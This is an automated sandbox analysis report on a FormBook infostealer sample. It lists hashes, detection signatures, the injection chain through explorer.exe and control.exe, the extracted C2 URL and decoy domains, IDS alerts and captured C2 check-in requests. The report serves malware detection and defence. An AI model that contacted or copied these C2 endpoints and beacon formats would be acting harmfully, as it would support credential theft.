Windows Analysis Report
UgHXEfw1uL.exe

Overview

General Information

Sample Name: UgHXEfw1uL.exe
Original Sample Name: e8fc0040e6882e0b9ea0e830b6d74d65.exe
Analysis ID: 1348466
MD5: e8fc0040e6882e0b9ea0e830b6d74d65
SHA1: fb0b39b5f5c570c83b37a62a7b1563a48aefe2c4
SHA256: 685107cecf3e5ac7ad43e40a9fc7d8ea35179a40973938ff74e5813d0a61dffc
Tags: 32exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • UgHXEfw1uL.exe (PID: 2668 cmdline: C:\Users\user\Desktop\UgHXEfw1uL.exe MD5: E8FC0040E6882E0B9EA0E830B6D74D65)
    • UgHXEfw1uL.exe (PID: 4984 cmdline: C:\Users\user\Desktop\UgHXEfw1uL.exe MD5: E8FC0040E6882E0B9EA0E830B6D74D65)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\control.exe MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 6768 cmdline: /c del "C:\Users\user\Desktop\UgHXEfw1uL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.piabellacasino347.com/bp31/"], "decoy": ["nftcyberpunk.com", "nwg7e.top", "go99subpay.com", "colkora.com", "bkicg.com", "chubbysamericangrill.com", "ongcndwoyao8060.top", "goodbye-horses.com", "gchzwf.com", "baisheng.site", "mkfnrej28.xyz", "rbxer.com", "evitasoht.site", "keymuscatgroups.com", "jobassistancehub.com", "school-necromancer.com", "shop-pravaonline.online", "prefabricated-homes-62419.com", "vzuvzabuv.com", "bolfm.com", "gasiu.com", "newcitymastery.com", "xt393d.vip", "adminonlinechecker.online", "10964.top", "labonnepaires.com", "cgpattorneys.com", "aroundyoo.com", "tqmsn.com", "dogclubuk.com", "tgtsfo.top", "nutridietas.com", "videopromarket.com", "alnawrasalrahhal.com", "starnation.top", "cascadefinnish.com", "fnb.gay", "mulharemedia.com", "gurubasavschool.com", "odisexport.com", "midastouchdesign.com", "scatter78.win", "kpmgds.com", "biddrivego.com", "chrisbrannon.online", "kazi-foods.com", "spitzpr-gq.info", "28ve5e.top", "millerstoehr.com", "69mom.com", "dmmtcloud.com", "arjuncrackers.com", "gracelouwilliams.com", "8881811.com", "fixerradvisory.com", "darkpinefarm.com", "duke91.com", "vemo.site", "photonpulsetherapy.com", "honchoheadies.com", "allthingsnewxpo.com", "turdfi.xyz", "wowukltd.com", "ctnezpay.com"]}
Source | Rule | Description | Author | Strings
00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_772cc62d | unknown | unknown
  • 0xa82:$a2: pass
  • 0xa88:$a3: email
  • 0xa8f:$a4: login
  • 0xa96:$a5: signin
  • 0xaa7:$a6: persistent
  • 0xc7a:$r1: C:\Users\user\AppData\Roaming\6K710O60\6K7log.ini
00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      Source | Rule | Description | Author | Strings
      3.2.UgHXEfw1uL.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      3.2.UgHXEfw1uL.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      3.2.UgHXEfw1uL.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      3.2.UgHXEfw1uL.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      3.2.UgHXEfw1uL.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          No Sigma rule has matched
          Timestamp: 11/27/23-12:12:31.959094
          Source IP: 192.168.2.5
          Destination IP: 195.35.38.7
          SID: 2031412
          Source Port: 49724
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/27/23-12:12:53.755681
          Source IP: 192.168.2.5
          Destination IP: 172.67.198.102
          SID: 2031412
          Source Port: 49725
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/27/23-12:11:51.038850
          Source IP: 192.168.2.5
          Destination IP: 103.224.212.216
          SID: 2031412
          Source Port: 49722
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/27/23-12:12:11.298434
          Source IP: 192.168.2.5
          Destination IP: 3.33.130.190
          SID: 2031412
          Source Port: 49723
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/27/23-12:10:28.412473
          Source IP: 192.168.2.5
          Destination IP: 3.33.130.190
          SID: 2031412
          Source Port: 49721
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook
          Source: UgHXEfw1uL.exe, ReversingLabs: Detection: 21%
          Source: UgHXEfw1uL.exe, Virustotal: Detection: 31%
          Source: Yara match, File source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: UgHXEfw1uL.exe, Joe Sandbox ML: detected
          Source: UgHXEfw1uL.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: UgHXEfw1uL.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: control.pdb source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: UgHXEfw1uL.exe, UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: gozr.pdb source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe
          Source: Binary string: gozr.pdbSHA256 source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 4x nop then pop ebx, 3_2_00407B1A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 4x nop then pop edi, 3_2_00417DB7
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop ebx, 5_2_02A77B1D
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi, 5_2_02A87DB7

          Networking

          Source: C:\Windows\explorer.exe, Network Connect: 172.67.198.102 80
          Source: C:\Windows\explorer.exe, Network Connect: 130.61.77.41 80
          Source: C:\Windows\explorer.exe, Network Connect: 195.35.38.7 80
          Source: C:\Windows\explorer.exe, Network Connect: 103.224.212.216 80
          Source: C:\Windows\explorer.exe, Network Connect: 3.33.130.190 80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 3.33.130.190:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 103.224.212.216:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 3.33.130.190:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 195.35.38.7:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.67.198.102:80
          Source: Malware configuration extractor, URLs: www.piabellacasino347.com/bp31/
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox View, ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
          Source: global traffic, HTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOv HTTP/1.1; Host: www.millerstoehr.com; Connection: close
          Source: global traffic, HTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk HTTP/1.1; Host: www.biddrivego.com; Connection: close
          Source: global traffic, HTTP traffic detected: GET /bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcp HTTP/1.1; Host: www.cascadefinnish.com; Connection: close
          Source: global traffic, HTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4 HTTP/1.1; Host: www.alnawrasalrahhal.com; Connection: close
          Source: global traffic, HTTP traffic detected: GET /bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp HTTP/1.1; Host: www.tqmsn.com; Connection: close
          Source: Joe Sandbox View, IP Address: 3.33.130.190 3.33.130.190
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Mon, 27 Nov 2023 11:10:28 GMT; Content-Type: text/html; Content-Length: 291; Connection: close; ETag: "6552b2f2-123"; Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Mon, 27 Nov 2023 11:12:11 GMT; Content-Type: text/html; Content-Length: 291; Connection: close; ETag: "6552b2aa-123"; Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biddrivego.com/bp31/www.cascadefinnish.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biddrivego.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolfm.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolfm.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolfm.com/bp31/www.videopromarket.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bolfm.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cascadefinnish.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cascadefinnish.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cascadefinnish.com/bp31/www.alnawrasalrahhal.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cascadefinnish.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.darkpinefarm.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.darkpinefarm.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.darkpinefarm.com/bp31/www.adminonlinechecker.online
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.darkpinefarm.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fixerradvisory.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fixerradvisory.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fixerradvisory.com/bp31/www.millerstoehr.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fixerradvisory.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fnb.gay
          Source: control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnb.gay/
          Source: control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnb.gay/&O
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnb.gay/bp31/
          Source: control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnb.gay/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=UJqh63c9yiVXKVsa3boGAX6IISqW51ijhAAZGwRU
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fnb.gay/bp31/www.fixerradvisory.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fnb.gayReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gchzwf.com
          Source: explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gchzwf.com/bp31/
